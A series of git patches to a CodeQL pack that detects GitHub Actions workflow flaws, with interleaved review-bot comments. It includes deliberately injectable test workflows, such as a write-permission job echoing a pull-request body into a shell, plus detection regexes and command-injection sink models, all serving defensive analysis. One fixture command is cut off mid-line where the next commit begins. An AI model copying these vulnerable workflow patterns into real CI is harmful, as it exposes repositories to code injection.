a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da..cb7e0936cca 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca8..210c3365eda 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c12..00000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a4..f898f18a295 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,14 +4,13 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.32 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 -dbscheme: yaml.dbscheme -extractor: yaml -groups: - - yaml + codeql/javascript-all: '*' + codeql/util: '*' + codeql/yaml: '*' + codeql/controlflow: '*' + codeql/dataflow: '*' +extractor: javascript +groups: javascript dataExtensions: - ext/*.model.yml - ext/**/*.model.yml diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme deleted file mode 100644 index 20d83c71ee6..00000000000 --- a/ql/lib/yaml.dbscheme +++ /dev/null 
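Review bot: Every entry under `dependencies:` in `ql/lib/qlpack.yml` is now `'*'`, so the library pack accepts any published version of `codeql/util`, `codeql/yaml`, `codeql/controlflow`, `codeql/dataflow` and the newly added `codeql/javascript-all`, and only a lock file keeps resolution reproducible. The caret ranges this hunk removes (`codeql/util: ^0.2.0`, `codeql/controlflow: ^0.1.0`, …) gave a compatibility floor; I would keep them and give `codeql/javascript-all` a caret range matching the version recorded in the lock files. Lock-file updates are visible for `ql/src` and `ql/test`; whether `ql/lib/codeql-pack.lock.yml` was updated as well cannot be seen from here.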
@@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); 
diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae98402..00000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26d..ce7000fc1b9 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a0..4192be6a4ca 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,12 +2,11 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.32 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: '*' githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26d..ce7000fc1b9 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72..80ebd80b4c2 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index d85fc698394..1676d742d37 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From 65b51996a6ff02d2d97e1480a768756ed18af33a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:59:51 +0200 Subject: [PATCH 0315/1267] new tests --- .../security/ArtifactPoisoningQuery.qll | 2 +- .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 +++++++ .../CWE-094/CodeInjectionMedium.expected | 7 +++++++ .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + 6 files changed, 59 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml 
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
index 3635004bc31..45d9a08d00a 100644
--- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
@@ -44,7 +44,7 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep
 ) and
 (
 not exists(this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])) or
- not this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])
+ this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])
 .matches("%github.event.workflow_run.id%")
 ) and
 (
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml
new file mode 100644
index 00000000000..e815c3dd129
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml
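Review bot: The `.matches("%github.event.workflow_run.id%")` test in the second disjunct recognises the triggering run only when that expression is written literally in the `run-id`/`run_id`/`workflow-run-id`/`workflow_run_id` argument, so a step that passes the same id through an `env` variable or an earlier step's output would presumably not be classified as an untrusted download. The condition also carries no comment saying why a run id taken from the triggering `workflow_run` is treated like a missing one; I would add `// the triggering run may come from a fork PR, so its artifacts are untrusted` above the disjunction. The body of `DownloadArtifactActionStep` starts and ends outside this hunk, so other conjuncts may narrow this further.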
@@ -0,0 +1,21 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + run: echo "::set-output name=id::$( Date: Mon, 3 Jun 2024 22:17:42 +0200 Subject: [PATCH 0316/1267] Dont consider pull_request with write permissions as priv --- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 ++- .../.github/workflows/priv_pull_request.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 + .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../CWE-829/UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 6 files changed, 20 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e31edf7900a..d4864a80e54 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -890,7 +890,8 @@ class JobImpl extends AstNodeImpl, TJobNode { e.isExternallyTriggerable() and // job is privileged (write access or access to secrets) ( - this.isPrivileged() + this.isPrivileged() and + not e.getName() = "pull_request" or not this.isPrivileged() and e.isPrivileged() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml new file mode 100644 index 00000000000..560e69f9e4b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml 
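Review bot: The new `not e.getName() = "pull_request"` conjunct in `JobImpl` assumes a `pull_request` run never receives a writable token or secrets, which holds for fork pull requests by default but not when a private repository is configured to send write tokens or secrets to fork pull request workflows. A short comment would record that assumption, for example `// fork pull_request runs get a read-only GITHUB_TOKEN and no secrets by default`. The exclusion is applied only to the `this.isPrivileged()` disjunct; whether `e.isPrivileged()` in the second disjunct already returns false for `pull_request` is not visible here, since the predicate starts and ends outside the hunk.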
@@ -0,0 +1,14 @@ +name: Privileged (only when local) pull request + +on: + pull_request: + +permissions: + pull-requests: write + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.body }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 718ef7a4ad1..f7b4ae7bc11 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 02000ea2bb0..be5a4e60b72 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -282,6 +283,7 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607d..92d5a0b5ce1 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9adfa3cee7c..544d26da9b7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,2 +1,3 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 28af21c556237ec784e0b0e1e1ae22c2484514c4 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 08:57:43 +0200 Subject: [PATCH 0317/1267] Update ql suites --- ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll | 5 +++-- ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll | 5 +++-- ql/src/Debug/partial.ql | 2 ++ ql/src/codeql-suites/actions-all.qls | 4 ++++ ql/src/codeql-suites/actions-code-scanning.qls | 2 ++ 5 files changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 302e8d5bb8d..cd049cccf4e 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -13,8 +13,9 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index ead69480d8a..a692c6e5874 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
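Review bot: The widened pattern in `EnvPathInjectionFromFileReadSink` still recognises a file read only when the command substitution is the entire value and the command name follows the opening delimiter with nothing in between. `regexpMatch` is a full-string match, so values like `prefix-$(cat f)` or `$( jq . f)` would not be flagged, while a mismatched `$(` opener with a backtick closer is accepted because the two lists are combined independently; how `value` is trimmed before this check is not visible in the hunk. The commit also removes the TODO although readers such as `head`, `tail`, `sed`, `awk` and `grep` remain uncovered, so I would keep a line like `// TODO: other file readers (head, tail, sed, awk, grep) are not matched yet`. The same expression is duplicated in the `EnvVarInjectionFromFileReadSink` hunk of `EnvVarInjectionQuery.qll`; a single shared predicate would keep the two sinks from drifting apart. The enclosing class starts above the hunk.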
@@ -26,8 +26,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 27cad8b98a4..cb8ba7873d8 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -5,6 +5,8 @@ * @precision low * @problem.severity error * @id actions/test-dataflow + * @tags actions + * debug */ import actions diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 32b9b5800cd..be9be866620 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -4,3 +4,7 @@ kind: - problem - path-problem +- exclude: + tags contain: + - debug + - model-generator diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 7d6c94e0c8c..d0fd74736ce 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -17,3 +17,5 @@ tags contain: - experimental - testing + - debug + - model-generator From 284c52f9728b1e302ba48eba369e585672afdcb2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 10:54:37 +0200 Subject: [PATCH 0318/1267] Bump qlpack versions --- .../actions/security/CachePoisoningQuery.qll | 61 ++++++++----------- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 22 +++++-- .../CWE-349/CachePoisoningByCodeInjection.ql | 24 +++++--- ql/src/qlpack.yml | 2 +- .../CWE-349/.github/workflows/test18.yml | 31 ++++++++++ 6 files changed, 91 insertions(+), 51 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 318548859b5..e80ea71c958 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -17,51 +17,40 @@ string defaultBranchNames() { result = default_branch_name ) or - not exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and result = ["main", "master"] } -predicate runsOnDefaultBranch(Job j) { - exists(Event e | - j.getATriggerEvent() = e and +predicate runsOnDefaultBranch(Event e) { + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") or - e.getName() = "push" and + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and e.getAPropertyValue("branches") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() - ) + // branches and branches-ignore filters + 
e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) - or - j.getATriggerEvent().getName() = "workflow_call" and - exists(ExternalJob call | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - runsOnDefaultBranch(call) - ) } abstract class CacheWritingStep extends Step { } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a4..bf05e80e0a6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.32 +version: 0.0.33 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index d81c13021c1..a6dc7e14fdd 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
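Review bot: `runsOnDefaultBranch` changes its parameter from `Job` to `Event` with no QLDoc, and the `workflow_call` case it used to resolve is silently handed to its callers. The removed branch recursed (`runsOnDefaultBranch(call)`), so a reusable workflow reached through a chain of callers was followed to the top; the two CWE-349 queries in this commit look only one caller up, which would miss nested reusable workflows unless `defaultBranchTriggerEvent()` (not visible here) covers `workflow_call`. I would state the new contract on the predicate, for example `/** Holds if a run triggered by e executes in the context of the default branch. Does not resolve workflow_call; check the caller's trigger events. */`. The `branches` and `branches-ignore` comparisons are exact string equality against `defaultBranchNames()`, so glob filters that include the default branch are presumably not recognised and deserve a fixture.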
@@ -16,15 +16,25 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where - // the workflow runs in the context of the default branch - runsOnDefaultBranch(j) and + j.getATriggerEvent() = e and + // job can be triggered by an external user + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and // the job checkouts untrusted code from a pull request // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and - // job can be triggered by an external user - j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -35,7 +45,7 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and s instanceof PoisonableStep and - // excluding privileged workflows since they can be easily exploited in similar circumstances + // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 5ed3c966ad3..8fdebdbde18 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
